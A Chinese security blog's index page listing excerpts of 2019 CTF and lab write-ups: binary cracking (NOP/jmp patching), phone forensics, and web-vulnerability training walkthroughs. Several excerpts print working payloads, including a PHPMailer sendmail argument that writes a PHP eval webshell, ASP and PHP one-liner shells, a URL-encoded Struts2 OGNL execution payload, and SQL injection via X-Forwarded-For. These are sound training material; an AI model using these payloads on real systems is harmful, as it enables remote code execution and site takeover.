自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(47)
  • 收藏
  • 关注

转载 MK

这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入欢迎使用Ma...

2019-12-27 17:45:03 351

原创 bugku_不好用的ce

1.查壳发现无壳,使用OD载入查看字符串,发现没有明显可用点,尝试跑飞程序,发现没有可用点。由于字符串有限,将所有字符串打断点单步调试,发现某字符串断点无效,查看附近代码发现je跳转,尝试将其nop,发现有弹窗将其弹出2.百度发现这是base58,解密得到flag...

2019-09-09 20:56:42 463

原创 bugku_love

1.查壳发现无壳,OD载入查看字符串发现提示,尝试爆破发现爆破出来的没有可用内容。在输入字符串处下断点单步调试2.单步调试发现我们输入的内容被装换为base643.继续单步调试发现,我们转换成base64后的内容与e3nifih9b_c@n@dh进行比较,如果相同,就会输出成功,对这串字符串base64解密得flag:python代码:import base64s = "e3nif...

2019-09-09 20:55:19 225

原创 bugku_逆向入门

1.查壳发现现实不是有效的PE工具,尝试打开发现无法正常打开。将exe拉入notepad++查看,发现是经过base64加密的图片2.使用在线base64转图片得二维码,使用手机扫描得到flag:...

2019-09-09 20:52:41 198

原创 bugku_游戏过关

1.查壳发现无壳,使用OD载入,使用字符串查壳发现提示:2.进入反汇编窗口,将原jnz条件判断跳转修改为jmp无条件跳转,即输入任意字符都会跳到实心处,修改所有jnz为jmp3.运行程序,输入任意字符,得到flag:...

2019-09-09 20:50:56 239

原创 bugku_Easy_Re

1.查壳发现无壳,使用OD载入,查看字符串发现提示:2.进入反汇编界面,发现跳转点,将其NOP掉可以爆破,在成功处下断点,跑起来后输入任意字符进入成功的部分,然后单步调试,在寄存器处发现flag:...

2019-09-09 20:49:11 247

原创 bugku_Easy_vb

1.OD载入,查看字符串,发现类似flag格式字符串2.修改MCTF为flag提交,发现正确

2019-09-09 20:47:01 130

原创 bugku_入门逆向

1.使用od打开,查看字符串,发现Unicode类型有字符串提示:2.进入反汇编界面发现有赋值语句,使用ida打开并找到赋值语句处,使用R将值转为字符3.连接字符串得到flag:flag{Re_1s_S0_C0OL}...

2019-09-09 20:45:50 476

原创 160个CrackME_003_Afkayas-2

1.去NAG:4C法1.程序拉入OD,看程序起始位置。VB程序的特征是开始一个push然后接一个call。这里可以看到程序要push的值是004067D4,所谓的4C法就是在这个地址的基础上加4C2.在数据窗口点击,然后ctrl+g定位到004067d4+4c3.选中68684000,,右键数据窗口跟随DWORD。可以看到有两块类似的数据,每块50(十六进制)个字节的长度,每块的第24...

2019-09-09 20:44:09 204

原创 160个CrackME_002_Afkayas-1

1.爆破使用Unicode字符串查找,发现了错误提示和正确提示,进入反汇编处,发现一个je(相等即跳转,ZF=1)跳转。如果跳转实现,程序会跑向失败的提示,那么将je置空(NOP),程序将是永远为对2.分析由爆破点往上查看,发现一个test,由于爆破点是je,需要重点关注,因为test常与je一起使用(test会影响zf标志位)往上查看发现用户名不同,密码:AKA-不同数字。下面分析数字...

2019-09-09 20:37:48 227

原创 Linux硬盘文件分析取证(SSH过的IP)

1.如题:文件中找到ssh过的IP2.下载文件,使用AccessDataFTKImager挂载3.通过资料得知linux系统日志存放地址是在/root/var/log/messages4.在messages中查找,使用ctrl+f快速查找ssh,发现:Nov 1 12:40:59 localhost auth.info sshd[3923]: Accepted password fo...

2019-08-27 18:50:17 505 1

原创 160个CrackME_001_Acid_burn

1.暴力破解1.使用PE工具查看有无壳,发现无壳2.使用OD,由于是无壳程序,查看字符串,发现可用点3.点击字符串按回车进入反汇编,发现存在跳转:jnz是结果不为0(或不相等则转移),可以推测这里在这个跳转之前有一个判断,是我们输入的结果如果是不正确,程序就会跳到失败的那一部分,由于这里是爆破,将jnz使用NOP填充,程序就只会弹出成功的窗口4.这个程序有两个弹窗,都可以用同样的方...

2019-08-27 18:45:22 211

原创 墨者学院_Apache Struts2远程代码执行漏洞(S2-001)

1.由题可得漏洞为S2-001,可知用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中,所以可以直接构造 Payload 进行命令执行。2.在密码处输入%{1+1}得到回显是2确认漏洞存在。3.构造任意执行payload:%{#a=(new java.lang.ProcessBuilder(new ...

2019-08-26 09:06:45 759

原创 墨者学院_PHPMailer远程命令执行漏洞溯源

1.打开靶场,找到发送邮件的位置,进入邮件页面2.填写邮件消息1.任意用户名2.在email写入:“aaa”. -OQueueDirectory=/tmp/. -X/var/www/html/a.php @aaa.com3.在message写入:<?php @eval($_POST[a]);?>3.使用菜刀连接,链接是:http://219.153.49.228:4105...

2019-08-26 09:05:47 290

原创 Bash漏洞分析溯源

1.由题意得知需要找到poc.cgi文件,通过查询得知文件目录一般为/cgi-bin/poc.cgi2.通过查询漏洞得知bash在处理() { :;};的环境变量赋值的代码上存在设计缺陷,会将函数定义后面的字符串作为命令执行,利用bash漏洞需要在闭合函数之后输出一个换行,可以使用echo;3.使用brupsuite捕获/cgi-bin/poc.cgi的报文,发送到Repeater修改4.将...

2019-08-26 09:04:43 242

原创 墨者学院_Apache Struts2远程代码执行漏洞(S2-016)复现

1.由题意得知靶场存在S2-16漏洞2.构造链接:url+/index.action并使用struts2漏洞扫描工具对网站进行扫描发现存在漏洞3.使用工具的远程代码执行功能,通过ls发现存在key文件,通过cat访问key文件得到key...

2019-08-26 09:04:02 341

原创 墨者学院_Apache Struts2远程代码执行漏洞(S2-015)复现

1.由题意得知靶场存在S2-15漏洞2.使用struts2漏洞扫描工具对网站进行扫描发现存在漏洞3.使用工具的远程代码执行功能,通过ls发现存在key文件,通过cat访问key文件得到key...

2019-08-26 09:03:12 726

原创 墨者学院_Apache Struts2远程代码执行漏洞(S2-007)复现

打开靶场,任意填写表单并提交使用BrupSuite捕获报文修改age的值为:%27+%2B+%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew+java.lang.Boolean%28%22false%22%29+%2C%23context%5B%22xwork.MethodAccesso...

2019-08-26 09:02:09 10628

原创 墨者学院_Apache Struts2远程代码执行漏洞(S2-004)复现

s2-004漏洞为:目录遍历漏洞。定义:在只是文件交互的一种简单的过程,但是由于文件名可以任意更改而服务器支持“~/”,“…/”等特殊符号的目录回溯,从而使攻击者越权访问或者覆盖敏感数据,如网站的配置文件、系统的核心文件,这样的缺陷被命名为路径遍历漏洞。在检查一些常规的Web应用程序时,也常常有发现,只是相对隐蔽而已。利用方法为:/struts/…%252f…%252f…%252f…%252f...

2019-08-26 09:00:41 332

原创 身份认证失效漏洞实战

本题解题思路:1.进入代理登录界面,右键进入源代码,查看各个代理的图片信息,发现图片里面有20128880316等的数字,猜测应该是id号码了,拿到马春生的id号;2.采用默认测试账号登录代理平台;3.登录进去之后,使用浏览器F12的功能,找到响应的报文,使用重新发送报文的功能,将id号修改为我们得到的马春生ID...

2019-08-26 08:58:36 735

原创 WebShell文件上传漏洞分析溯源(第2题)

解题思路:1.打开靶场尝试上传文件,得到提示只能上传图片后缀文件2.构造一句话木马并修改后缀为JPG3.选择构造好的JPG木马文件上传并使用BrupSuite截取报文4.修改捕捉到的报文,将.jpg后缀修改为.php并发送5.得到路径,使用菜刀连接得到KEY:mozhe738dbe4cd3009c463152fcd7695...

2019-08-26 08:54:39 111

原创 WebShell文件上传漏洞分析溯源(第1题)

1.由题意得到解题思路为php上传绕过扩展名2.打开靶场,构造一句话尝试上传,发现后缀为.php的文件无法上传3.尝试将后缀改为.php3发现上传成功,得到路径4.使用蚁剑链接得到KEY...

2019-08-26 08:53:44 270

原创 WebShell文件上传分析溯源(第2题)

1.根据提示使用御剑扫描扫描目录,发现/admin/upload1.php和/admin/upload2.php目录,尝试登陆/admin/upload1.php发现JS弹窗,点击跳转至/admin/upload2.php,尝试禁用JS发现文件上传页面2.使用BRUPSUITE抓包,发现没有返回路径3.尝试捕获/admin/upload1.php报文,在cookie处发现verify关键字,将...

2019-08-25 21:08:44 192

原创 WebShell文件上传分析溯源(第1题)

1.由题意知是后台备份获取shell,可以利用的是一句话木马2.进入靶场,使用弱口令登录3.发现有上传点,上传一句话图片,上传成功后得到路径4.由提示进行备份5.将一句话图片得到的路径填入,名称自己填写6.备份成功,得到路径7.蚁剑链接8.得到key...

2019-08-25 21:06:09 138

原创 内部文件上传系统漏洞分析溯源

利用IIS6.0漏洞,即建立*.asp文件夹,其中的文件都会解析成为asp文件。1.如题,测试可上传文件类型,发现可以上传txt文件2.在txt文件中构造asp一句话:<%eval request("pass")%>并上传3.使用BrupSuite修改上传的文件夹,即Content-Disposition:form-data;name=”path”下面的一行为服务保存文...

2019-08-25 21:04:16 195

原创 用户终端环境识别

1.打开靶场获得提示,需要使用英文版本的IPad,分辨率为1024x768访问页面,使用BURPSUITE捕获报文,发送到Repeater修改报文2.修改User-Agent:Mozilla/5.0(iPad;U;CPUOS4_3_3likeMacOSX;en-us)AppleWebKit/533.17.9(KHTML,likeGecko)Version/5.0.2Mobile/8J2Safar...

2019-08-25 20:59:40 546

原创 表单暴力破解实训(第1题)

使用BrupSuite进行简单的暴力破解

2019-08-25 20:57:04 222

原创 WEB页面源代码查看

F12 = =

2019-08-25 20:55:13 2081

原创 PHP本地包含漏洞代码溯源

根据提示:服务端获取p的值,加上.txt后缀,使用file函数将文件包含然后读取,由于服务端没有对P过滤导致本地包含漏洞形成1.r.php存在文件包含漏洞2.key在the_key_is_here.txt中3.key在目录4.p是url的传参,访问的时候使用?p=5.构造url:ip/r.php?p=/the_key_is_here ->得到KEY...

2019-08-25 20:54:07 237

原创 PHPMailer远程命令执行漏洞溯源

1.打开靶场,找到发送邮件的位置,进入邮件页面2.填写邮件消息1.任意用户名2.在email写入:“aaa”. -OQueueDirectory=/tmp/. -X/var/www/html/a.php @aaa.com3.在message写入:<?php @eval($_POST[a]);?>3.使用菜刀连接,链接是:http://219.153.49.228:4105...

2019-08-25 20:52:46 293

原创 HTTP头注入漏洞测试(X-Forwarded-for)

1.使用BrupSuite捕获flag.php页面的报文并发送到Repeater2.发现报文中并没有X-Forwarded-for条目,自己添加3.在X-Forwarded-for条目后面使用mysql注入语句测试注入1.判断字段:使用order by,测试出有四个字段2.使用union select 1,2,3,4 查看回显的位置3.判断表名union select 1,2,3,(se...

2019-08-25 20:51:32 783

原创 HTML前端代码分析(暗链)

1.由题意得知需要在页面源码中发现解题信息2.使用火狐的F12功能查看源码,在源码中发现了一个含有内网的不明文件链接3.尝试将链接中的文件直接添加到网站的url中4.发现得到KEY...

2019-08-25 20:50:37 554

原创 CMS系统漏洞分析溯源(第5题)

1.由提示可以知道本题需要我们不使用密码登录2.打开靶场,使用御剑扫描,发现一个/admin/的后台地址页面3.通过资料了解到这个php通过校验访问的cookie,使用cookie edit修改cookie,添加admin_name,value随意4.访问/admin/cms_admin.php,进入后台5.拉倒网页最下面拿到KEY...

2019-08-25 20:49:03 357

原创 安卓手机文件分析取证(Wi-Fi密码)

1.如题:找到WiFi密码,安卓手机存放WiFi的文件为wpa_supplicant.conf。和之前做的找到WiFi名称一模一样2.使用everything搜索找到文件,记事本打开3.在文件里发现psk=“714825219”,714825219就是wifi密码4.验证得到key...

2019-08-23 10:40:55 334

原创 安卓手机文件分析取证(微信发送的视频)

1.如题:找到微信视频,微信视频的存储地址一般是tencent/MicroMsg2.下载文件,进入文件夹,找到一个video文件夹,在里面得到视频名称,根据以往经验,这个是验证码3.验证通过得到key另外可以利用everything我们需要找的是视频,英语是video,一般为了方便,是以英文命名的文件夹,可以尝试搜索找到文件夹再具体查找...

2019-08-23 10:37:51 632

原创 安卓手机文件分析取证(微信保存的图片)

1.如题:找到微信保存的图片,由资料得知微信的文件夹的目录是在tencent/MicroMsg2.下载文件并打开,进入tencent/MicroMsg3.因为是需要图片,尝试搜索常见图片后缀,例如这里是.png4.找到图片,图片名是验证码:9E58-5RT2-32KM5.验证通过得到KEY...

2019-08-23 10:35:28 1048

原创 安卓手机文件分析取证(陌陌ID号)

1.如题:要求得到陌陌ID号,这个属于账号信息,资料得知id号存储在users中2.下载文件使用everything搜索users找到文件夹进入,看到两个疑似ID号3.尝试验证6614531504.验证成功,得到KEY...

2019-08-23 10:33:34 1662

原创 安卓手机文件分析取证(Wi-Fi名称)

1.如题:找到WiFi名称,安卓手机存放WiFi的文件为wpa_supplicant.conf2.使用everything搜索找到文件,记事本打开3.在文件里发现ssid=“123”,123就是wifi名称4.验证得到key...

2019-08-23 10:30:12 440

原创 安卓手机文件分析取证(陌陌发送的语音)

1.如题:2.科普类题目文件中查找,路径:mnt/shell/emulated/0/immomo找到uesrs文件夹,找到一个验证码:6D4C-8FE4-3072验证通过得到key

2019-08-23 10:26:31 668

原创 日常密码泄露分析溯源

1.如题2.御剑扫描得到后台地址/admin/3.使用brup爆破,建立user.txt和pass.txt,写入可能是用户名和密码,开始爆破4.得到用户名:xiaojun,密码:xiaohong0214

2019-08-23 10:17:52 395

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除